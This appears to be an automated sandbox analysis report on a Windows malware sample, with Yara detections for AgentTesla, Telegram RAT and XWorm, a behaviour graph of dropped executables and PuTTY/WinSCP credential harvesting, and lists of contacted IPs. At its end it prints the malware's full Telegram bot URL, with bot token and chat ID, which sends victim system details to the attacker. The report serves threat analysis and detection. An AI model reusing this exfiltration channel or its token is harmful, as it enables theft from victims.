Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562433 Sample: DJ5PhUwOsM.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 20 api.telegram.org 2->20 22 api.ipify.org 2->22 32 Suricata IDS alerts for network traffic 2->32 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 40 14 other signatures 2->40 7 DJ5PhUwOsM.exe 1 5 2->7         started        signatures3 38 Uses the Telegram API (likely for C&C communication) 20->38 process4 file5 16 C:\Users\user\AppData\...\FB_7D21.tmp.exe, PE32 7->16 dropped 18 C:\Users\user\AppData\...\FB_7BD8.tmp.exe, PE32 7->18 dropped 10 FB_7BD8.tmp.exe 15 2 7->10         started        14 FB_7D21.tmp.exe 14 2 7->14         started        process6 dnsIp7 24 162.254.34.31, 49705, 587 VIVIDHOSTINGUS United States 10->24 26 api.ipify.org 104.26.13.205, 443, 49704 CLOUDFLARENETUS United States 10->26 42 Antivirus detection for dropped file 10->42 44 Multi AV Scanner detection for dropped file 10->44 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 10->46 54 4 other signatures 10->54 28 89.40.31.232, 1717, 49707, 49753 TELEMEDIA-ASRO Romania 14->28 30 api.telegram.org 149.154.167.220, 443, 49706 TELEGRAMRU United Kingdom 14->30 48 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->48 50 Protects its processes via BreakOnTermination flag 14->50 52 Machine Learning detection for dropped file 14->52 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
89.40.31.232
 unknown Romania
35512 TELEMEDIA-ASRO true
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
162.254.34.31
 unknown United States
64200 VIVIDHOSTINGUS true

Contacted Domains

Name IP Active
api.ipify.org 104.26.13.205 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    89.40.31.232 true
    • Avira URL Cloud: safe
    		 unknown
    https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 false
      		high